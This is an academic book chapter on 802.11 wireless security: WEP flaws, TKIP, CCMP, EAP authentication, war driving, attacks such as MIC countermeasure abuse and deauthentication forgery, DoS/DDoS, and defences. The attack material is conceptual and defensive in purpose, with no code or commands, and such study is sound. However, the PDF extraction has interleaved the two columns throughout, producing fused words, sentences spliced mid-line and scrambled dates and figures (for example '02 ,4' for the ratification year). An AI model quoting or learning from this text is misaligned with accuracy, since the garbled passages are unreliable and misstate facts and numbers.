ovErvIEw of sEcurIty and mutual authentication as explained later.
cHAllEngEs In wIrElEss
nEtworks Specific Challenges and Key Issues
Security has traditionally consisted of ensuring The security challenges in wireless networks can
confidentiality of data, the completebe integrity
roughly dividedofinto two main categories, based
the data, and the availability of the data when ever on their scope and impact. The first-category in
needed—where service is not denied. Generally volves attacks targeting the entire network and its
speaking, both wired and wireless network environ- infrastructure. This may include the following:
ments are complicated. Security solutions are most
effectivewhentheycanbecustomizedto • aspecific
Channel jamming: This involves jamming
installation. Unfortunately, a high percentage of the wireless channel in the physical layer thus
individuals involved in building and maintain- denying network access to legitimate users.
ing inter-networks and infrastructures for these Typical example is the DoS attack.
environments have little knowledge of security • Unauthorized access: This involves gaining
protocols. As a result, many of today’s systems free access to the network and also using
are vulnerable. Recent reports indicated that the theAPtobypassthefirewallandaccessthe
wireless networks are becoming more popular. As internal network. Once an attacker has ac-
these networks deployments increase, so does the cess to the network, he/she can then launch
challenge to provide these networks with security. additional attacks or just enjoy free network
Wireless networks face more security challenges use. Although free network usage may not
than their wired counterparts. This is partly due be a significant threat to many networks,
to the nature of the wireless medium as transmit- however network access is a key step in
ted signals can travel through the walls, ceilings, address resolution protocol (ARP)-based
and windows of buildings up to thousands of feet man-in-the-middle (MITM) attacks.
outside of the building walls. Moreover, since the • Traffic analysis: This attack enables gaining
wireless medium is airwaves, it is a shared medium information about data transmission and net-
that allows any one within certain distance or work activity by monitoring and intercepting
proximity to intrude into the network and sniff the patterns of wireless communication. This
traffic.Further,therisksofusingasharedmedium involves analyzing the overhead wireless
is increasing with the advent of available hacking traffictoobtainusefulinformation.Thereare
tools that can be found freely from hacker’s Web three forms of information that an attacker can
sites. Additionally, some default wireless access obtain. First, he/she can identify that there is
0
activity on the network. Secondly, he/she can message,thenreleasethemodifiedmessage

findinformationaboutthelocationofto APs intarget destination. This can be done
the
the surrounding area. This is because unless by setting a rogue AP as described in Lynn
turned off, APs broadcast their service set and Baird (2002).
identifiersSSIDs) ( foridentification.•Thirdly, Message forgery: In this attack, as the wire-
he/she may learn the type of protocols being less link is not protected for message integrity,
used in the transmission. an attacker can inject forged messages into
both directions of the communication.
The second category involves attacks against • Session hijacking: In this attack, an attacker
the communication between the stations and the causes the user to lose his/her connection, and
AP. This may include the following: he/she assumes his/her identity and privileges
for a period. It is an attack against the integ-
• Faking/replay attack: This involves the rity of a session. The target knows that it no
ability to guess the structure of transmitted longer has access to the session but may not
information (even if it is encrypted) and be aware that the session has been taken over
replace the legitimate message with one by an attacker. The target may attribute the
which has the correct structure but that has session loss to a normal malfunction of the
altered fields. This is known as faking. WLAN. A
simple form of faking, and one that absolutely
must be protected against, is that of replay. Analysis of wired Equivalent Privacy
In this, an attacker simply records and then (wEP) Protocol
replays a message from one legitimate party
to another. A new form of replay attack is Wired equivalent privacy (WEP) has been part of
known as wormhole attack. In this attack, the1standard
2. 0 8 sinceitsinitialratificationin
the attacker records packets or individual bits September 1999. It is designed for data privacy and
from a packet at one location in the network, encryption to protect messages form unauthorized
tunnels them to another location, and replays viewing in case they are intercepted in the air. Its
it there as described in Yih-Chun (2006). goals are to provide integrity, availability, and
• Eavesdropping: This implies the interception confidentialitytothewirelessnetworks.Howeve
of information/data being transmitted over the notablesecurityresearchfindings - haveshownde
wireless network. When the wireless link is ficienciesandaws fl inthedesignofWEP(Fluhrer,
not encrypted, an attacker can eavesdrop the Mantin, & Shamir, 2001; Gast, 2002, pp. 93-96).
communication even from some few miles
away. The attacker can gain two types of war driving and Its variants
information from this attack; he/she can read
the data transmitted in the session and can also The process of identifying and categorizing the
gather information indirectly by examining wirelessnetworksbyusingpre-configuredlaptops
thepacketsinthesession,specifically from within their
a moving vehicle is called war driving.
source, destination, size, number, and time War drivers use laptops and some special software
of transmission. Eavesdropping can also be to identify wireless networks and let them under-
active; in this case the attacker not only listens stand the security associated with any particular
to the wireless connection, but also actively wireless network that they have recorded. They
injects messages into the communication also upload their war driving results to a Web site
medium. where others who have access will be able to see
• Man-in-the-middle attack (MITM): In this exactly where these unsecured wireless networks
attack, the attacker resides between the station are located. The use of GPS has aided this objec-
and the AP, and can intercept and modify the tive even further.

War driving Web site http://www.worldwideward- Temporary Key Integrity Protocol (TKIP)
rive.org has done the data collection during four
rounds of war driving world wide from 2002 to Wi-Fi protected access (WPA) was designed to
02.4 Their first worldwide war driving started replace WEP with the combination of the TKIP,
onAugustand 13 finishedonSeptember02., 7 which provides data confidentiality - through en
During this time, 9,374 APs were located and in cryption, and a new cryptographic message integ-
only 30.13% had WEP encryption enabled. The rity code called MIC or Michael, which provides
second drive lasted from October 26 to November data integrity. TKIP comprises the same encryp-
2, 2002 when they tracked 24,958 APs, with only tionengineandRC4algorithmdefinedforWEP.
27.2% having WEP enabled. During the third drive However, unlike WEP the TKIP uses a 128 bits key
which happened from June 28 to July 5, 2003, for encryption and 64 bits key for authentication.
88,122 APs were located with only 32.26% WEP This solves the problem of a shorter WEP key.
enabled. The fourth drive started in June 2004 for TKIP also added a per-packet key mixing func-
some months, located 228,537 APs and the total tion to de-correlate the public initialization vectors
number of wireless networks running WEP was (IVs) from weak keys. Furthermore, TKIP also
found to be 38.3%. provides a rekeying mechanism to provide fresh
encryption and integrity keys by giving each user
security Enhancements a unique shared key per session and by using IV as
a counter. It discards any IV value received out of
Inthecontextoftheaforementioneddeficiencies, sequence. If the IV space is exhausted, a new key
an IEEE 802.11i or IEEE 802.11 Task Groupi (TGi) is negotiated. This makes TKIP protected networks
developed a new set of WLAN security protocols more resistant to cryptanalytic attacks involving
to form the future IEEE 802.11i standard. The key reuse. TKIP provides better security than the
new security standard, 802.11i, which was con- WEP by adding four new algorithms:
firmedandratifiedinJuneeliminates 02 ,4 allthe
weaknesses of WEP. It is divided into three main • It provides a nonlinear hash function (Mi-
categories (Strand, 2004) and these enhancements chael) that produces a 64 bit output. Unlike
are described as follows: CRC used in WEP, Michael is keyed. Only
those who know the secret key can compute
1. Temporary key integrity protocol (TKIP): a valid hash.
This is essentially a short term solution that • It provides a new IV sequencing discipline
fixesallWEPweaknesses.Itwouldbe - com to remove replay attacks from the attacker’s
patible with old 802.11 devices and it provides arsenal.
integrityandconfidentiality. • It also has a per-packet key mixing function to
2. Counter mode with cipher block chain- de-correlate the public IVs from weak keys.
ing-message authentication code protocol • Finally, it provides a rekeying mechanism, to
(CCMP): This is a new protocol designed provide fresh encryption and integrity keys,
with planning, based on RFC 2610 which undoing the threat of attacks stemming from
uses Advanced Encryption Standard (AES) key reuse.
as cryptographic algorithm. Since this is more
CPU intensive than RC4 (used in WEP and Table 1 shows how WPA uses TKIP and Michael
TKIP), new and improved 802.11 hardware to address the cryptographic weaknesses of WEP
may be required. It provides integrity and (Cable, 2004).
confidentiality.
3. Extensible authentication protocol (EAP): Counter CBC-MAC Mode
EAP is a general protocol for point-to-point
(PPP) authentication that supports multiple Counter with cipher block chaining-message
authentication mechanisms. authentication code or simply (CCM) is a mode

Table 1. WPA vs. WEP

WEP weakness How weakness is addressed by WPA
IV is too short In TKIP, the IV has been doubled in size to 48 bits.
The WEP-encrypted CRC-32 checksum calculation has been replaced with Michael. The Michael
Weak data integrity
algorithm calculates a 64-bit message integrity code (MIC) value, which is encrypted with TKIP
TKIP and Michael use a set of temporal keys that are derived from a master key and other values. The
Uses the master key master key is derived from the extensible authentication protocol-transport layer security (EAP-TLS) or
rather than derived key Protected EAP (PEAP) 802.1X authentication process. Additionally, the secret portion of the input to the
RC4 PRNG is changed with each frame through a packet mixing function.
No rekeying WPA rekeys automatically to derive new sets of temporal keys.
No replay protection TKIP uses the IV as a frame counter to provide replay protection.
of operation for a symmetric key block cipher withtheCCM,confidentialityandauthenticati

algorithm. CCM may be used to provide assur- are provided by the counter mode (CM) and the
anceoftheconfidentialityandtheauthenticity cipher block chainingof message authentication code
computer data by combining the techniques of the (CBC-MAC).
counter (CTR) mode and the cipher block chain- CCMPaddressesallknownWEPdeficiencies,
ing-message authentication code (CBC-MAC) but without the restrictions of the already-deployed
algorithm. CCM is based on an approved sym- hardware. The protocol has many properties in
metric key block cipher algorithm whose block common with TKIP (Cam-Winget et al., 2003).
size is 128 bits, such as the AES. CCM consists WEP, TKIP, and CCMP can be compared as in
of two related processes: generation-encryption Table 2.
and decryption-verification, which combine two
cryptographic primitives: counter mode encryption 0.x/EAP Authentication
and cipher block chaining based authentication.
Only the forward cipher function of the block IEEE 802.1x was created for authentication in PPP.
cipher algorithm is used within these primitives. It ties a protocol called EAP, which can be applied
In generation-encryption, cipher block chaining is to both the wired and wireless networks. It also
applied to the payload, the associated data, and a supports multiple authentication methods, such
nonce to generate a message authentication code as EAP-Message Digest (EAP-MD5), EAP-One
(MAC); then, counter mode encryption is applied Time Password (EAP-OTP), EAP-Transport Layer
to the MAC and the payload to transform them into Security (EAP-TLS), EAP-Tunneled TLS (EAP-
a ciphertext. Thus, CCM generation-encryption TTLS), EAP-Generic Token Card (EAP-GTC),
expands the size of the payload by the size of the Microsoft CHAP version 2 (EAP-MSCHAPv2),
MAC. In decryption-verification, counter andmode
EAP-FAST (Blunk & Vollbrecht, 1998).
decryption is applied to the purported ciphertext to In 802.1x EAP authentication process, a client
recover the MAC and the corresponding payload; attempts to connect with an authenticator (AP). The
then, cipher block chaining is applied to the payload, AP responds by enabling a port for passing only
the received associated data, and the received nonce EAP packets from the client to an authentication
to verify the correctness of the MAC. Successful server located on the wired side of the AP. The
verification provides assurance that the payload
APblocks allothertraffic,suchasHTTP,DHCP,
and the associated data originated from a source and POP3 packets, until the AP can verify the
with access to the key (Dworkin, 2004). client’s identity using an authentication server (e.g.,
CCMP is the preferred encryption protocol RADIUS). Once authenticated, the AP opens the
in the 802.11i standard. CCMP is based upon the client’sportforothertypesoftraffic.Thesummary
CCM mode of the AES encryption algorithm. Thus, of the process is as shown in Figure 1.
CCMP utilizes 128-bit keys, with a 48-bit IV. As

Table 2. WEP, TKIP, and CCMP comparison (Cam-Winget, Housley, Wagner, & Walker, 2003)
WEP TKIP CCMP
Cipher RC4 RC4 AES
128 bits encryption,

Key size 40 or 104 bits 128 bits
64 bits authentication
Key lifetime 24-bit IV, wrap 48-bit IV 48-bit IV
Packet key integrity Concatenating IV to base

Mixing function Not needed
key
Packet data CRC-32 Michael CCM
Packet header None Michael CCM
Replay detection None Use IV sequencing Use IV sequencing
Key management None EAP-based (802.1x) EAP-based (802.1x)
• Client or supplicant sends an association other Protocols

request to the authenticator (AP)
• The authenticator or AP replies with associ- Thissectionwillbrieflyintroduceotherprotoco
ated response to the supplicant (client) that are being used or being developed in securing
• Supplicant sends an EAP-start message to wireless networks.
the authenticator
• The authenticator replies with an EAP-request • TIK protocol: TESLA with instant key
identity message disclosure protocol or simply TIK protocol
• The supplicant sends an EAP-response was proposed in Yih-Chun (2006). It is an
packet containing the received identity to extension of the TESLA broadcast authen-
the authentication server tication protocol (Perrig, Canetti, Tyger, &
• The authentication server uses a specific Song, 2000). It implements temporal leashes
authentication algorithm to verify the client’s andprovidesefficientinstantauthenticat
identity for broadcast communication in wireless
• The authentication server will either send an networks. The intuition behind TIK is that the
acceptance or rejection message to the AP packettransmissiontimecanbesignificantly
• The AP sends an EAP-success packet (or longer than the time synchronization error. In
reject packet) to the client these cases, a receiver can verify the TESLA
security condition (that the corresponding key
If the authentication server accepts the client, has not yet been disclosed) as it receives the
then the AP will transition the client’s port to an packet; this fact allows the sender to disclose
authorized state and forward additional the keytraffic.
in the same packet. TIK implements a
However, potential for MITM attacks in tunneling temporal leash and, thus, enables the receiver
EAP protocols such as PEAP and EAP-TTL are to detect a wormhole attack. It is based on
documented in an IACR report that is available efficientsymmetric cryptographic primitives
online (http://eprint.iacr.org/2002/163/). (a message authentication code is a sym-
metric cryptographic primitive). It requires

Figure 1. General EAP authentication process
client network Access Point Authentication server
Association Request
Association Response
EAP Start
EAP Request / ID
EAP Response / ID EAP Response / ID
EAP Success / Failure Success / Failure
EAP Key (optional )
accurate time synchronization between all WPA Passive Dictionary Attack

communicating parties, and requires each
communicating node to know just one public This attack can be launched against a WPA
value for each sender node, thus enabling pre-shared key (with four-way handshake) setup
scalable key distribution. ing1 2.08 networks using a dictionary file of
• SSTP protocol: Microsoft is working on a words (Takahashi, 2004). As a precaution, avoid
remote access tunneling protocol that allows dictionary words for the pass phrase during AP
client devices to securely access networks configuration and make pass phrase more than
via a virtual private network (VPN) from 20 characters.
anywhere on the Internet without any is- The process of the four-way handshake shown in
sues with typical port blocking problems. Figure 2 can be explained as follows. The AP and
The secure socket tunnelingprotocol (SSTP) communicating station need an individual pairwise
makes a VPN tunnel that goes over Secure- transient key (PTK) to shield the unicast conversa-
HTTP, eliminating issues associated with tion between them. To come out with a different
VPN connections based on the point-to-point PTK for each AP-station pair, a pairwise master
tunneling protocol (PPTP) or layer 2 tunnel- key (PMK) is included in the algorithm, along with
ing protocol (L2TP) that can be blocked by MAC address, ANonce, and SNonce (two random
some Web proxies, firewalls, and network values)The . firsttwomessagesmanagetoderive
address translation (NAT) routers that sit the same PTK without transmitting in the air. The
between clients and servers. The protocol is AP also generates a group transient key (GTK) to
only for remote access and will not support shield all conversations, especially multicast and
site-to-site VPN tunnels. (Fontana, 2007) broadcast. As all stations on the wireless network
needs that same GTK to decrypt broadcast or
multicast frames, the AP sends the current GTK
other Attacks on wireless security in the third message of the handshake.
To stop someone from hacking the commu-
There are some other effective attacks that can be nication, the GTK is encrypted with the PTK.
launched against 802.11 wireless networks and they To avoid forgery in these handshake messages,
arebrieflyexplainednext(Earle,.026)

Figure 2. WPA-PSK four-way handshake

wireless 802.11 wireless Access
station Point
PMK is known and PMK is known and
SNonce is generated ANonce is generated
Message 1 : [Anonce]
Create PTK from
ANonce and SNonce
Message 2 : [snonce, MIc]
Create PTK from
ANonce and SNonce
and supply GTK
Message 3 : [MIc, Encrypted gtk ]
Install PTK Message 4 : [MIc] Install PTK

and GTK
Encrypted Communication follows
second, third and fourth messages have a message done. For decryption process, the encrypted text is
integrity code (MIC). The MIC is generated by XOR-ed with the key to get the plaintext. Firstly, the
hashingaspecifiedportionofthemessage andplaintext
known then attack is done when the attacker
encrypting that hash with the PTK. This four-way knows two things: cleartext and the encrypted
handshake occurs whenever someone connects to text of a message communication. Having both
a WLAN using WPA. It also occurs thereafter, the encrypted and unencrypted form of the same
whenever the AP decides to refresh the transient information allows one to perform this attack and
keys (Phifer, 2007). to retrieve the encryption key. The attacker needs
to XOR cleartext and encrypted text to get the
Attack on Michael MIC key. Secondly, to carryout the double encryption
attack, a frame must be captured and the attacker
Michael MIC was introduced to prevent attacks must change the frame header destination MAC
through message modification. It usesaddress a featureto that of the attacker’s wireless client.
known as TKIP countermeasure procedure, which After this subtle change, the attacker must wait
works by disabling the AP if it receives two MIC for the IV to reset to one minus the original IV
failures within one second. After exactly one min- of
( themodifiedframe),sothathe/shecanreplay
ute, the AP comes back to life and would need all the captured frame into the air. When the AP sees
its past and current users to re-key to gain access the frame with the expected IV, it will encrypt the
to the network. An attacker could send corrupt frame, actually being fooled into decrypting the
packets to the AP which can pass the frame CRC frame instead of encrypting it. After doing the un-
check, but would trigger the TKIP countermeasure knowing decryption process, the AP will forward
eventually shutting down the AP, especially after the cleartext frame across the air to the forged
repeatedcorrupttraffic. MAC address specified by the attacker. Thirdly,
to achieve the message modification attack, the
Encryption Attacks on Known Plaintext, attacker must capture an encrypted packet that is
Double Encryption, and Message going to another subnet, modify a single bit, and
attempttoresendit.Themodificationwilloffsett
Modification
IC and the packet will be rejected. After trying a
numberoftimes,thebitsthatareflippedwillmake
For WEP encryption process, an XOR operation
the IC correct again, although the packet would
of message (or plaintext) with encryption key is
be malformed. The attacker can do this numerous

times without any logging or alerts from the AP. 6. Positioning and shielding of the antenna can
Once the packet passes the AP’s IC check, it will help to direct the radio waves to a limited
reach the route. The router will observe that the space.
packet is malformed and would send a response 7. Enabling of accounting and logging can help
that contains the cleartext and associated encrypted to locate and trace back some mischief that
text packet to the initial sender. This will give could be going on in the network. Preven-
the attacker the ingredients to perform cleartext tive measures can then be taken after the
cryptanalysis. A solution is to encrypt the 802.11 preliminary analysis of the log file. Allow
frames within a layer 3 (network layer) wrapper, regularanalysisoflogfilescapturedtotrace
so that any tampering cannot go undetected. any illegal access or network activity.
8. Using intrusion detection software to moni-
general wlAn security Measures tor the network activity in real time and to
inform alerts.
General security measures to minimize some of 9. Using honey pots or fake APs in the regular
thementionaws fl arelistedasfollows(Held,; 302 network to confuse the intruder so that he/she
Hurton & Mugge, 2003; Issac. Jacob, & Moham- gets hooked to that fake AP without achieving
med, 2005): anything.
10. Turn off the network during extended periods
. 1 Encryptthenetworktraffic.WPAwithTKIP/ of non-use or inactivity.
AES options can be enabled. Upgrade the . 1 Usefilesharingwithcaution.Iftheuserdoes
firmware on AP to preventtheuseofweak not need to share directories and files over
IV WEP keys. thenetwork,filesharingshouldbedisabled
2. Ensuring mutual authentication through IEEE on his/her computers.
802.1x protocol. Client and AP should both 12. Do not auto-connect to open Wi-Fi (wireless
authenticate to each other. Implementing fidelity)networks.
IEEE 802.1x port-based authentication with 13. Connect using a VPN as it allows connecting
RADIUS server (with PEAP/MS-CHAPv2) securely. VPNs encrypt connections at the
would be a good choice. sending and receiving ends through secure
3. Make the wireless network invisible by dis- tunnels.
ablingidentifierbroadcasting.Turningfirewalls . 4 1 Use offthe inbetweenwirelessandwired
SSIDbroadcastbyAPandconfiguretheAP network segments andimplementfilters.
not to respond to probe requests with SSID 15. Generally avoid dictionary words for pass
“any,” by setting your own SSID. Meaning, phrase in any authentication. Also make
rename the wireless network and change the the pass phrase more than 20 characters,
default name. especially if WPA-Pre Shared Key security
4. Changing the default WEP key settings, if is employed.
any. Changing the default IP address in the
AP to a different one. Change administrator’s
password from the default password. If the tyPEs of dEnIAl of sErvIcE
wireless network does not have a default AttAcks And PrEvEntIvE MEA-
password, create one and use it to protect the surEs
network.
. 5 Enabling the MAC filtering in AP level DoS orsimply means the inability of a user, process,
in RADIUS server or in both can tighten the or system to get the service that it needs or wants.
security more, as there is a restriction in the Common DoS attacks on networks include direct
use of MAC addresses (this step in itself, can attacks, remote controlled attacks, - reflective
bedefeatedthroughMACspoofing). tacks, and attacks with worms and viruses.

DoS attacks are quite effective against wire- The OS level DoS attacks rely on the ways
less networks. The wireless management frames operating systems implement protocols. A typi-
which are transmitted in cleartext in a wireless cal example is the ping of death attack in which
network, informs the clients that they can connect Internet control message protocol (ICMP) echo
or disconnect. The de-authentication frame will requests having total data sizes greater than the
disassociate a wireless end device from an AP. maximum IP standard size to be sent to the targeted
Since they are sent in cleartext, they can easily be victim. This attack often has the effect of crashing
forged to force legitimate users out of the network. the victim’s machine.
This can be accomplished by replaying a previous In application-based attacks, machine or a ser-
disassociation frame with a wireless sniffer. An vice are compromised and set out of order either
attack on 802.11b with 802.11g mixed network by taking advantage of specific bugs in network
mode can affect the clear channel assessment (CCA) applications that are running on the target host or
process that brings down the probability that two by using such applications to drain the resources
wireless nodes will transmit on the same frequency of their victim. It is also possible that the attacker
simultaneously. This attack can cause all nodes in may have found points of high algorithmic com-
range to shut down until the attacker stops injecting plexity and exploits them in order to consume all
the malicious frame. A layer 2 encryption would available resources on a remote host.
be the only solution to this. The EAP-DoS attack In data ooding
fl attacks, an attacker uses all
involves injecting a number of EAP stat frames network bandwidth or any other device bandwidth
to an AP and if the AP cannot properly process by sending massive quantities of data and so caus-
all these frames, there is the chance that it might ing it to process extremely large amounts of data.
become inoperable. Another attack against the For instance, the attacker bombards the targeted
AP involves sending malformed EAP messages. victim with normal, but meaningless packets with
One of the recent attacks against the AP involves spoofed source addresses.
fillinguptheEAPidentifierspacethatallows 52
DoS attacks based on protocol features take
ID tags to keep track of each client instance. If an advantage of certain standard protocol features
attackercanood fl theAPwithalargenumber such as IPofand MAC source addresses. Typically,
client connection instances, using up this counter, the attacker spoofs these features. Several types of
a DoS attack can be achieved (Earle, 2006). DoS attacks have focused on domain name systems
Different researchers have categorized DoS and (DNSs), and many of these involve attacking DNS
DDoS from different perspectives. As documented cache on name servers. An attacker who owns a
in Christos and Aikaterini (2003), DoS attacks can name server may coerce a victim name server into
beclassifiedintofivedifferentcategories, cachingnamely:
false records by querying the victim about
(1) network device level attack, (2) operating system the attackers own site. A vulnerable victim name
(OS), level attack, (3) application level attack, (4) server would then refer to the rogue server and
dataood fl attack,and)protocol4( attack.
cache the answer (Davidowicz, 1999).
Network device level attack includes attacks Other researchers such as Papadimitratos and
that might be caused either by taking advantage of Hass (2002) and Marti, Giuli, Lai, and Baker (2001)
bugs or weaknesses in driver software or by try- describe DoS attacks in relation to routing layer
ing to exhaust the hardware resources of network and those at the link or MAC layer.
devices. Network level attacks may also involve Attacks at the routing layer could consist of the
compromising a series of computers and placing following: (1) the attacker participates in routing
an application or agent on the computers. The and simply drops a certain number of the data
computer then listens for commands from a central packets. This causes the quality of the connections
control computer. The compromise of computers todeteriorateandfurtherramifications - onthe
can either be done manually or automatically formance if TCP is the transport layer protocol that
through a worm or virus. is used;) 2the ( attacker transmits falsified rout

updates. The effects could lead to frequent route address he/she wants to spoof. An attacker can
failures thereby deteriorating performance; (3) the learn the MAC address of the valid user by captur-
attacker could potentially replay stale updates. This ing wireless packets using any packet capturing
might again lead to false routes and degradation software by passively or actively observing the
in performance; and (4) reduce the time-to-live traffic.Webspoofingpermitsanattackertoobserve
(TTL) field in the IP header so that the packet andchangealltheWebtrafficsenttothevictim’s
never reaches the destination. Routing attacks machine and capture all data entered into the Web
are usually directed at dynamic routing protocols page forms (if any) by the victim. The attack can be
such as border gateway protocol (BGP), open done using Web plug-ins and JavaScript segments.
shortest path firstOSPF) ( , andenhancedThe interior
attack, once implemented, is started when
gateway routing protocol (EIGRP). Direct DoS or the victim visits a malicious Web page through a
DDoS attacks against routing protocols can lead to Web link in a malicious e-mail message sent by
regional outages. Another form of routing attack the attacker. DNS spoofing is where the attacker
iscalledrouteinjection,whichcanlead makes to traffic
a DNS entry to point to another IP address
redirection,prefixhijacking,andsoforth. thanAttacks
it would be generally pointing to. It works
at the MAC layer are described next. through stealth by unknowingly forcing a victim
to generate a request to the attacker’s server, and
Flooding and Spoofing Attacks then spoofing the response from that server. IP
spoofing is a process used to gain unauthorized
Flooding attack, as the name implies, involves the access to computers, whereby the attacker sends
generationofspuriousmessagestoincrease packets totraffic
a computer with spoofed IP address
on the network. While spoofing attacks involves implying that the message is coming from a trusted
the creation of packets with spoofed (i.e., forged) and genuine host.
source IP addresses and other credentials.
In smurf attack, an attacker sends a large amount ddos Attack
of ICMP echo traffic to a set of IP broadcast - ad
dresses, multiplying the traffic by theDDoS number of usually refer to an attack by use of
attacks
hostsresponding.ICMPooding fl attackuses public
sites that respond to ICMP echo request packets the network. In this attack, an attacker installs the
withinanIPnetworktoood fl thevictim’s DDoS site. It controls on a network of computers,
software
involvesooding fl thebufferofthetarget computer
mostly through security compromise. This allows
with unwanted ICMP packets. SYNood fl attack the attacker to remotely control compromised
is also known as the transmission control protocol computers, thereby making it handlers and agents.
(TCP) SYN attack and is based on exploiting the From a “master” device, the attacker can control the
standard TCP three-way handshake. In this case, slave devices and direct the attack on a particular
an attacker sends SYN packet to initiate connec- victim. Thousands of machines can be controlled
tion. The victim responds with the second packet from a single point of contact as shown in Figure
back to the source address with SYN-ACK bit set. 3. There are several types of DDoS attacks, but
The attacker never responds to the reply packet. In their methods are very similar in that they rely on
this case, the victim’s TCP receive queues would a large group of previously compromised systems
be filled up, denying new TCP connections. - toAndirect a coordinated distributed ood fl att
other variant of this attack is called user datagram against a particular target.
protocol (UDP) oodingfl attack Craig, ( . )0 2 ChristosandAikateriniclassified ) 30 2 ( DDoS
This attack is based on UDP echo and character based on the degree of the attack automation.
generator services provided by most computers on Theseclassificationsaremanual,semi-automatic
a network. In MAC spoofing attack, an attacker and automatic DDoS attacks. The manual attack
spoofs his/her original MAC address to the MAC involves manual scanning of remote machines for

Figure3.DDoSattackscenariousingagents/zombiestofloodthevictim
Attacker
Control traffic to
handlers
Handler Handler Handler
Control traffic to
agents/zombies
Agent Agent Agent Agent Agent Agent
Flooding traffic to
victim computer
victim
vulnerabilities, then the attacker breaks into anyone example, an image-based challenge may be used
of them to install attack codes. Semi-automatic at- to determine whether the client is a real human
tacks are partially manual and partially automatic. being or an automated script. A similar approach
In this case, the attacker scans and compromises based on capabilities was proposed in Agarwal,
handlers and agents by using automated scripts. Dawson, and Tryfonas (2003), and the method
He/she then types the victims address manually generally relies on clients having to ask the server
and the onset of the attack is specified by the
for permission to send packets. If the server decides
handler machines. In automatic DDoS attacks to allow the connection, it replies with a capabil-
the communication between attacker and agent ity token, which the client includes in subsequent
machines is completely avoided. In most cases packets and which the network polices.
the attack phase is limited to a single command Greenhalgh, Handley, and Huici (2005) de-
throughtheattackcodefile.Allthefeatures scribedan ofthe approachconsistedofdivertingtraffi
attack, for example the attack type, the duration, going to protected servers so that it traverses control
and the victims address are preprogrammed in the points. These control points would encapsulate the
attack code. This way, the possibility of revealing traffic,sendingittoadecapsulatorneartheserv
the attacker’s identity or source is very minimal. The server could then tell which control point a
A number of DDoS tools that are available from malicious ow fl had traversed, and request it be
the Internet have been identified byshut the Internet
down at this boundary. Signature-based and
Security Systems (ISS) (www.iss.net). anomaly based detection techniques are proposed
in Park and Lee (2001) and Shields (2002). Some
defense Mechanisms Against dos solutions involve the use of strong digital signature
Attacks based transport level authentication mechanisms as
recently proposed in Dierks and Allen (2006).
Several techniques to counter DoS and DDoS
attacks have been proposed by researchers, and Mechanisms Against Spoofing
we briefly discuss some of these techniques. A
challenge based mechanisms was proposed by Attackers launching spoofing usually hide the
Kandula, Katabi, Jacob, and Berger (2005). For identity of machines they used to carry out an
0
attack by falsifying the source address of the possibilityistodiverttrafficbasedonIPprotoco

network communication. This makes it more dif- to different servers or even route it differently.
ficulttoidentifythesourcesofattack Thus, traffic.
for a Web Itis server it might be possible to
therefore important to use network switches that route ICMP and UDP traffic bound for the Web
haveMACbindingfeaturesthatstorethe serverfirst MAC else entirely, or even block it
somewhere
address that appears on a port and do not allow at the router, so that only TCP-based oods fl will
this mapping to be altered without authentication. succeed. This at least narrows the scope of attacks
To prevent IPspoofing, disable source routing on that can be made.
allinternalroutersanduseingress Web filtering.
Another filtering technique is called ingres
spoofing depends mainly upon social engineering filtering. This filtering prevents spoofed attac
tricks and it is thus important to educate users and from entering the network by putting rules on
to be generally aware of the address window in a point-of-entry routers that restrict source addresses
browser that displays the Web address that they to a known valid range.
are directed to. That can help if some suspicious Filtering can also be based on channel control.
Web site address comes up. DNSspoofing can be Thismethodisknownaschannelcontrolfiltering
prevented by securing the DNS servers and by andcanbeachievedbyfilteringoutDDoScontrol
implementinganti-IPaddressspoofingmeasures messages; this prevents the attacker from causing
(Paul, Ben, & Steven, 2003). Some vendors have the attack servers to begin the attack. This can also
added access control lists (ACL), implemented be accomplished using a signature-based packet
throughMACaddressfiltering,toincrease - filter. secu
Ifwecandevelopsignaturesformostcontrol
rity. MAC address filtering amounts tochannel allowing packets, we can simply reject them at the
predeterminedclientswithspecificMAC addresses
control channelpacketfilter,and- theywilldisa
to authenticate and associate. While the addition of pear from the network.
MACaddressfilteringincreasessecurity,itisnota
perfect solution given that MAC addresses can be
spoofed. Also, the process of manually maintaining futurE trEnds
a list of all MAC addresses can be time consuming
anderrorprone.ThereforeMACaddressDue filtering
to the rapid changes in treat level and attack-
is probably best left for only small and fairly static ing techniques, existing defense mechanisms may
networks (Mohammed & Issac, 2005). not be adequate to counter the threats of the future
attacks. Therefore, it is important for researchers
Filtering Techniques to continue analyzing different threats as they
emerge and develop more effective and efficient
Filtering requires being able to filter defense the ood
fl
mechanisms. For instance, detecting
packets. This can be achieved with a signature- distributed and automated attacks still remains
based packet filter. If one can create signatures a challenge. Due to the drawback of some of the
for typicalood fl packets (TCP packets with zero
exiting solutions or defense mechanisms as well as
data size for example, or unusually large ICMP the emergence of new attack tools, further study is
packets)and , filteroutthosepackets,needed onecan then well-known security drawbacks
to combine
filter the ood fl packets while allowing “normal”
with defense techniques that are already mature
traffictoproceed. and very effective. Moreover, it is also important
Another filtering option is to reject to look theinto the first
developing of DoS management
IP packet from any IP address. This works with framework for protecting, detecting, and reacting
many current generations of attack tools because to attacks when they occur. The following sum-
theytendtouseaat fl distributionrandom marizesnumber
expected future trends in DoS and DDoS
generator to generate spoofed source addresses, and attacks—attacks on emerging technologies; attacks
they only use each random address once. Another against anti-DoS infrastructure; attacks with the

aid of malware, adware, or spyware; recursive Craig, A. H. (2000). The latest in denial of service
DNS attacks or the use of DNS server for DoS attacks:Smurfingdescriptionandinformationto
attack; and attacks against OpenEdge WebSpeed minimize effects. Retrieved May 17, 2006, from
platforms, and so forth. http://www.pentics.net/denial-of-service/white-
papers/smurf.cgi
Davidowicz, D. (1999). Domain name system
conclusIon (DNS) security. Retrieved June 23, 2006, from
http://compsec101.antibozo.net/ papers/dnssec/
This chapter explores some of the security vulner-
dnssec.html
abilities associated with 802.11 wireless networks.
Here basic issues with WEP and better protocols Dierks, T., & Allen, C. (2006). The TLS protocol
like TKIP and CCMP were discussed with some (RFC 2246). Retrieved December 7, 2006, from
advice on security precautions. Later emphasis http://www.ietf.org/rfc/rfc2246.txt
was given on DoS and DDoS attacks to show
Dworkin, M. (2004). Recommendation for block
how complicated and varied they are in nature.
cipher modes of operation: The CCM mode of
DoS attacks are done quite effectively against
authenticationandconfidentiality. Retrieved No-
wired and wireless networks and it costs much in
vember 17, 2006, from http://csrc.nist.gov/publica-
terms of the damages done. Defense mechanisms
tions/nistpubs/800-38C/SP800-38C.pdf
against such attacks are still not perfect and the
chapter eventually reviews and explains some sets Earle, A. E. (2006). Wireless security handbook.
